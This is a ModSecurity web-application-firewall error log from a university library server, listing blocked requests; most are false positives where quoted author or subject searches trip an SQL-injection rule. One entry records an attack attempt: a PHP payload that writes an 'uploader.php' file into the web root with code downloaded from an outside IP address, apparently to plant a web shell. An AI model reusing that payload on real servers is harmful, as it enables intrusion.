[Mon Aug 28 11:17:29.944814 2023] [:error] [pid 41243] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwf2cCo-f0AAKEbEkEAAAAI"]
[Mon Aug 28 11:17:45.398652 2023] [:error] [pid 41201] [client 47.128.19.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Variable thermal conductivity\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwf6cCo-f0AAKDxIDUAAAAK"]
[Mon Aug 28 11:19:46.410525 2023] [:error] [pid 41242] [client 47.128.28.175] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Continous markov chain\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwgYsCo-f0AAKEaHVYAAAAB"]
[Mon Aug 28 11:21:04.610964 2023] [:error] [pid 41258] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Design\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwgsMCo-f0AAKEqZE0AAAAH"]
[Mon Aug 28 11:21:51.184526 2023] [:error] [pid 41261] [client 47.128.26.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22J.M. Feng\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwg38Co-f0AAKEtkeAAAAAE"]
[Mon Aug 28 11:25:03.416366 2023] [:error] [pid 41203] [client 47.128.30.146] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/JTS.EMER.2016.008_(Cover).gif.gif"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOwhn8Co-f0AAKDz6WwAAAAM"]
[Mon Aug 28 11:26:07.022548 2023] [:error] [pid 41335] [client 85.208.96.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22WIDODO, Thomas Sri\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwh38Co-f0AAKF3LM0AAAAR"]
[Mon Aug 28 11:35:56.861206 2023] [:error] [pid 41555] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22HILLIER, Frederick\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwkLMCo-f0AAKJT5fwAAAAK"]
[Mon Aug 28 11:43:45.794734 2023] [:error] [pid 41747] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Snyder, James C.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwmAcCo-f0AAKMTgWoAAAAC"]
[Mon Aug 28 11:45:05.187258 2023] [:error] [pid 41747] [client 47.128.28.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Self-adaptive assembly systems\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwmUcCo-f0AAKMTgWwAAAAC"]
[Mon Aug 28 11:47:34.351356 2023] [:error] [pid 41613] [client 47.128.18.243] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Science and technology\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwm5sCo-f0AAKKNa8MAAAAB"]
[Mon Aug 28 11:51:50.863061 2023] [:error] [pid 41865] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Taguchi DOE\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwn5sCo-f0AAKOJNvYAAAAP"]
[Mon Aug 28 11:57:17.198680 2023] [:error] [pid 42006] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22DELPHI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwpLcCo-f0AAKQWsTIAAAAW"]
[Mon Aug 28 11:58:22.274774 2023] [:error] [pid 42014] [client 47.128.28.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Collaborative networks\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwpbsCo-f0AAKQeC5MAAAAZ"]
[Mon Aug 28 12:00:12.490536 2023] [:error] [pid 42004] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Mass customisation\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwp3MCo-f0AAKQUXngAAAAT"]
[Mon Aug 28 12:07:52.702722 2023] [:error] [pid 42086] [client 47.128.27.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Sivaraj Ramachandran\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwrqMCo-f0AAKRmjVcAAAAG"]
[Mon Aug 28 12:16:43.418509 2023] [:error] [pid 42093] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Semma El Alami\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwtu8Co-f0AAKRtKVkAAAAa"]
[Mon Aug 28 12:18:29.593290 2023] [:error] [pid 42259] [client 47.128.30.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ron Fisher\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwuJcCo-f0AAKUTJvgAAAAI"]
[Mon Aug 28 12:20:45.295420 2023] [:error] [pid 42363] [client 47.128.29.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Micheal Omotayo Alabi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwurcCo-f0AAKV7ZAgAAAAH"]
[Mon Aug 28 12:21:50.085983 2023] [:error] [pid 42371] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Modelling\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwu7sCo-f0AAKWD5oAAAAAV"]
[Mon Aug 28 12:25:58.351953 2023] [:error] [pid 42597] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Diana Holmes\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwv5sCo-f0AAKZlf3gAAAAJ"]
[Mon Aug 28 12:30:28.171155 2023] [:error] [pid 42667] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Condition monitoring\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOww9MCo-f0AAKar6LkAAAAA"]
[Mon Aug 28 12:32:25.420025 2023] [:error] [pid 42669] [client 34.72.81.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:vz. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '].'/ found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w '),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOwxacCo-f0AAKatNPAAAAAG"]
[Mon Aug 28 12:34:32.458702 2023] [:error] [pid 42721] [client 47.128.29.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Jurnal Teknik Sipil\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwx6MCo-f0AAKbhtuAAAAAT"]
[Mon Aug 28 12:37:47.840271 2023] [:error] [pid 42799] [client 47.128.27.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Nanua Singh\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwyq8Co-f0AAKcv8cQAAAAS"]
[Mon Aug 28 12:40:37.923708 2023] [:error] [pid 42794] [client 47.128.25.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22J.G. Lv\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwzVcCo-f0AAKcq2esAAAAL"]
[Mon Aug 28 12:48:35.335602 2023] [:error] [pid 43064] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22A.S. Balu\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw1M8Co-f0AAKg4Fd8AAAAN"]
[Mon Aug 28 12:59:48.686928 2023] [:error] [pid 43210] [client 47.128.19.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/JTS.EMER.2016.020_(Cover).png.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOw31MCo-f0AAKjKsKYAAAAT"]
[Mon Aug 28 13:07:30.766317 2023] [:error] [pid 43302] [client 47.128.26.241] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Rachmad Setiawan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw5osCo-f0AAKkmyvwAAAAD"]
